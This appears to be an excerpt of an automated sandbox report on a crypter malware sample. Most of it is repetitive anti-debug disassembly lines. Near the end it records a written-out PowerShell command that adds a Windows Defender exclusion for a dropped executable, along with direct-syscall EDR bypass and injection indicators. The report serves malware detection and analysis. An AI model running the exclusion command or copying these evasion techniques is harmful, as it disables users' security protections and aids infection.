Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0173E872 mov eax, dword ptr fs:[00000030h] 5_2_0173E872
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01746870 mov eax, dword ptr fs:[00000030h] 5_2_01746870
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01746870 mov eax, dword ptr fs:[00000030h] 5_2_01746870
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B4859 mov eax, dword ptr fs:[00000030h] 5_2_016B4859
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B4859 mov eax, dword ptr fs:[00000030h] 5_2_016B4859
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016E0854 mov eax, dword ptr fs:[00000030h] 5_2_016E0854
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0175483A mov eax, dword ptr fs:[00000030h] 5_2_0175483A
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0175483A mov eax, dword ptr fs:[00000030h] 5_2_0175483A
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016D2835 mov eax, dword ptr fs:[00000030h] 5_2_016D2835
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016D2835 mov eax, dword ptr fs:[00000030h] 5_2_016D2835
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016D2835 mov eax, dword ptr fs:[00000030h] 5_2_016D2835
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016D2835 mov ecx, dword ptr fs:[00000030h] 5_2_016D2835
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016D2835 mov eax, dword ptr fs:[00000030h] 5_2_016D2835
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016D2835 mov eax, dword ptr fs:[00000030h] 5_2_016D2835
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016EA830 mov eax, dword ptr fs:[00000030h] 5_2_016EA830
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0173C810 mov eax, dword ptr fs:[00000030h] 5_2_0173C810
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0177A8E4 mov eax, dword ptr fs:[00000030h] 5_2_0177A8E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016EC8F9 mov eax, dword ptr fs:[00000030h] 5_2_016EC8F9
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016EC8F9 mov eax, dword ptr fs:[00000030h] 5_2_016EC8F9
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_017808C0 mov eax, dword ptr fs:[00000030h] 5_2_017808C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B0887 mov eax, dword ptr fs:[00000030h] 5_2_016B0887
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0173C89D mov eax, dword ptr fs:[00000030h] 5_2_0173C89D
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016ACB7E mov eax, dword ptr fs:[00000030h] 5_2_016ACB7E
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0175EB50 mov eax, dword ptr fs:[00000030h] 5_2_0175EB50
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01782B57 mov eax, dword ptr fs:[00000030h] 5_2_01782B57
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01782B57 mov eax, dword ptr fs:[00000030h] 5_2_01782B57
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01782B57 mov eax, dword ptr fs:[00000030h] 5_2_01782B57
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01782B57 mov eax, dword ptr fs:[00000030h] 5_2_01782B57
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01746B40 mov eax, dword ptr fs:[00000030h] 5_2_01746B40
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01746B40 mov eax, dword ptr fs:[00000030h] 5_2_01746B40
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01758B42 mov eax, dword ptr fs:[00000030h] 5_2_01758B42
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0177AB40 mov eax, dword ptr fs:[00000030h] 5_2_0177AB40
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016A8B50 mov eax, dword ptr fs:[00000030h] 5_2_016A8B50
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01764B4B mov eax, dword ptr fs:[00000030h] 5_2_01764B4B
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01764B4B mov eax, dword ptr fs:[00000030h] 5_2_01764B4B
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016DEB20 mov eax, dword ptr fs:[00000030h] 5_2_016DEB20
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016DEB20 mov eax, dword ptr fs:[00000030h] 5_2_016DEB20
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01778B28 mov eax, dword ptr fs:[00000030h] 5_2_01778B28
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01778B28 mov eax, dword ptr fs:[00000030h] 5_2_01778B28
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0172EB1D mov eax, dword ptr fs:[00000030h] 5_2_0172EB1D
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0172EB1D mov eax, dword ptr fs:[00000030h] 5_2_0172EB1D
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0172EB1D mov eax, dword ptr fs:[00000030h] 5_2_0172EB1D
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0172EB1D mov eax, dword ptr fs:[00000030h] 5_2_0172EB1D
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0172EB1D mov eax, dword ptr fs:[00000030h] 5_2_0172EB1D
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0172EB1D mov eax, dword ptr fs:[00000030h] 5_2_0172EB1D
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0172EB1D mov eax, dword ptr fs:[00000030h] 5_2_0172EB1D
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0172EB1D mov eax, dword ptr fs:[00000030h] 5_2_0172EB1D
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0172EB1D mov eax, dword ptr fs:[00000030h] 5_2_0172EB1D
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01784B00 mov eax, dword ptr fs:[00000030h] 5_2_01784B00
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0173CBF0 mov eax, dword ptr fs:[00000030h] 5_2_0173CBF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B8BF0 mov eax, dword ptr fs:[00000030h] 5_2_016B8BF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B8BF0 mov eax, dword ptr fs:[00000030h] 5_2_016B8BF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B8BF0 mov eax, dword ptr fs:[00000030h] 5_2_016B8BF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0175EBD0 mov eax, dword ptr fs:[00000030h] 5_2_0175EBD0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B0BCD mov eax, dword ptr fs:[00000030h] 5_2_016B0BCD
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B0BCD mov eax, dword ptr fs:[00000030h] 5_2_016B0BCD
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B0BCD mov eax, dword ptr fs:[00000030h] 5_2_016B0BCD
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01764BB0 mov eax, dword ptr fs:[00000030h] 5_2_01764BB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01764BB0 mov eax, dword ptr fs:[00000030h] 5_2_01764BB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C0BBE mov eax, dword ptr fs:[00000030h] 5_2_016C0BBE
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C0BBE mov eax, dword ptr fs:[00000030h] 5_2_016C0BBE
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0172CA72 mov eax, dword ptr fs:[00000030h] 5_2_0172CA72
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0172CA72 mov eax, dword ptr fs:[00000030h] 5_2_0172CA72
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016ECA6F mov eax, dword ptr fs:[00000030h] 5_2_016ECA6F
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016ECA6F mov eax, dword ptr fs:[00000030h] 5_2_016ECA6F
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016ECA6F mov eax, dword ptr fs:[00000030h] 5_2_016ECA6F
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0175EA60 mov eax, dword ptr fs:[00000030h] 5_2_0175EA60
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C0A5B mov eax, dword ptr fs:[00000030h] 5_2_016C0A5B
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016C0A5B mov eax, dword ptr fs:[00000030h] 5_2_016C0A5B
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B6A50 mov eax, dword ptr fs:[00000030h] 5_2_016B6A50
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B6A50 mov eax, dword ptr fs:[00000030h] 5_2_016B6A50
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B6A50 mov eax, dword ptr fs:[00000030h] 5_2_016B6A50
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B6A50 mov eax, dword ptr fs:[00000030h] 5_2_016B6A50
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B6A50 mov eax, dword ptr fs:[00000030h] 5_2_016B6A50
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B6A50 mov eax, dword ptr fs:[00000030h] 5_2_016B6A50
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B6A50 mov eax, dword ptr fs:[00000030h] 5_2_016B6A50
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016DEA2E mov eax, dword ptr fs:[00000030h] 5_2_016DEA2E
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016ECA24 mov eax, dword ptr fs:[00000030h] 5_2_016ECA24
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016ECA38 mov eax, dword ptr fs:[00000030h] 5_2_016ECA38
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016D4A35 mov eax, dword ptr fs:[00000030h] 5_2_016D4A35
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016D4A35 mov eax, dword ptr fs:[00000030h] 5_2_016D4A35
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_0173CA11 mov eax, dword ptr fs:[00000030h] 5_2_0173CA11
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016EAAEE mov eax, dword ptr fs:[00000030h] 5_2_016EAAEE
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016EAAEE mov eax, dword ptr fs:[00000030h] 5_2_016EAAEE
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B0AD0 mov eax, dword ptr fs:[00000030h] 5_2_016B0AD0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01706ACC mov eax, dword ptr fs:[00000030h] 5_2_01706ACC
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01706ACC mov eax, dword ptr fs:[00000030h] 5_2_01706ACC
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01706ACC mov eax, dword ptr fs:[00000030h] 5_2_01706ACC
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016E4AD0 mov eax, dword ptr fs:[00000030h] 5_2_016E4AD0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016E4AD0 mov eax, dword ptr fs:[00000030h] 5_2_016E4AD0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B8AA0 mov eax, dword ptr fs:[00000030h] 5_2_016B8AA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B8AA0 mov eax, dword ptr fs:[00000030h] 5_2_016B8AA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016BEA80 mov eax, dword ptr fs:[00000030h] 5_2_016BEA80
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016BEA80 mov eax, dword ptr fs:[00000030h] 5_2_016BEA80
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016BEA80 mov eax, dword ptr fs:[00000030h] 5_2_016BEA80
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016BEA80 mov eax, dword ptr fs:[00000030h] 5_2_016BEA80
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016BEA80 mov eax, dword ptr fs:[00000030h] 5_2_016BEA80
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016BEA80 mov eax, dword ptr fs:[00000030h] 5_2_016BEA80
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016BEA80 mov eax, dword ptr fs:[00000030h] 5_2_016BEA80
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016BEA80 mov eax, dword ptr fs:[00000030h] 5_2_016BEA80
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016BEA80 mov eax, dword ptr fs:[00000030h] 5_2_016BEA80
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01784A80 mov eax, dword ptr fs:[00000030h] 5_2_01784A80
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016E8A90 mov edx, dword ptr fs:[00000030h] 5_2_016E8A90
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01748D6B mov eax, dword ptr fs:[00000030h] 5_2_01748D6B
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B0D59 mov eax, dword ptr fs:[00000030h] 5_2_016B0D59
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B0D59 mov eax, dword ptr fs:[00000030h] 5_2_016B0D59
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B0D59 mov eax, dword ptr fs:[00000030h] 5_2_016B0D59
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B8D59 mov eax, dword ptr fs:[00000030h] 5_2_016B8D59
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B8D59 mov eax, dword ptr fs:[00000030h] 5_2_016B8D59
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B8D59 mov eax, dword ptr fs:[00000030h] 5_2_016B8D59
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B8D59 mov eax, dword ptr fs:[00000030h] 5_2_016B8D59
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016B8D59 mov eax, dword ptr fs:[00000030h] 5_2_016B8D59
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016DED25 mov eax, dword ptr fs:[00000030h] 5_2_016DED25
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016DED25 mov eax, dword ptr fs:[00000030h] 5_2_016DED25
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016DED25 mov eax, dword ptr fs:[00000030h] 5_2_016DED25
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01784D30 mov eax, dword ptr fs:[00000030h] 5_2_01784D30
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01738D20 mov eax, dword ptr fs:[00000030h] 5_2_01738D20
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01768D10 mov eax, dword ptr fs:[00000030h] 5_2_01768D10
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01768D10 mov eax, dword ptr fs:[00000030h] 5_2_01768D10
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016CAD00 mov eax, dword ptr fs:[00000030h] 5_2_016CAD00
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016CAD00 mov eax, dword ptr fs:[00000030h] 5_2_016CAD00
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016CAD00 mov eax, dword ptr fs:[00000030h] 5_2_016CAD00
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016E4D1D mov eax, dword ptr fs:[00000030h] 5_2_016E4D1D
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016A6D10 mov eax, dword ptr fs:[00000030h] 5_2_016A6D10
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016A6D10 mov eax, dword ptr fs:[00000030h] 5_2_016A6D10
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016A6D10 mov eax, dword ptr fs:[00000030h] 5_2_016A6D10
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016ACDEA mov eax, dword ptr fs:[00000030h] 5_2_016ACDEA
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_016ACDEA mov eax, dword ptr fs:[00000030h] 5_2_016ACDEA
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01750DF0 mov eax, dword ptr fs:[00000030h] 5_2_01750DF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Code function: 5_2_01750DF0 mov eax, dword ptr fs:[00000030h] 5_2_01750DF0
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ygTGgAEg.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ygTGgAEg.exe" Jump to behavior
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe NtSetInformationThread: Direct from: 0x77D263F9
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe NtQueryInformationToken: Direct from: 0x77D32CAC
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe NtCreateFile: Direct from: 0x77D32FEC
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe NtOpenFile: Direct from: 0x77D32DCC
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe NtSetInformationProcess: Direct from: 0x77D32C5C
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe NtProtectVirtualMemory: Direct from: 0x77D32F9C
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe NtOpenKeyEx: Direct from: 0x77D32B9C
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe NtResumeThread: Direct from: 0x77D336AC
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe NtMapViewOfSection: Direct from: 0x77D32D1C
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe NtWriteVirtualMemory: Direct from: 0x77D32E3C Jump to behavior
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe NtCreateMutant: Direct from: 0x77D335CC
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe NtNotifyChangeKey: Direct from: 0x77D33C2C
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe NtQuerySystemInformation: Direct from: 0x77D32DFC
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe NtReadFile: Direct from: 0x77D32ADC Jump to behavior
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe NtAllocateVirtualMemory: Direct from: 0x77D32BFC
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe NtCreateUserProcess: Direct from: 0x77D3371C Jump to behavior
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe NtQueryInformationProcess: Direct from: 0x77D32C26
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe NtResumeThread: Direct from: 0x77D32FBC Jump to behavior
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe NtDelayExecution: Direct from: 0x77D32DDC
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe NtQueryAttributesFile: Direct from: 0x77D32E6C
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe NtSetInformationThread: Direct from: 0x77D32B4C
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe NtReadVirtualMemory: Direct from: 0x77D32E8C Jump to behavior
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe NtCreateKey: Direct from: 0x77D32C6C
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe NtClose: Direct from: 0x77D32B6C
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe NtOpenKeyEx: Direct from: 0x77D33C9C
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe NtWriteVirtualMemory: Direct from: 0x77D3490C Jump to behavior
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe NtOpenSection: Direct from: 0x77D32E0C
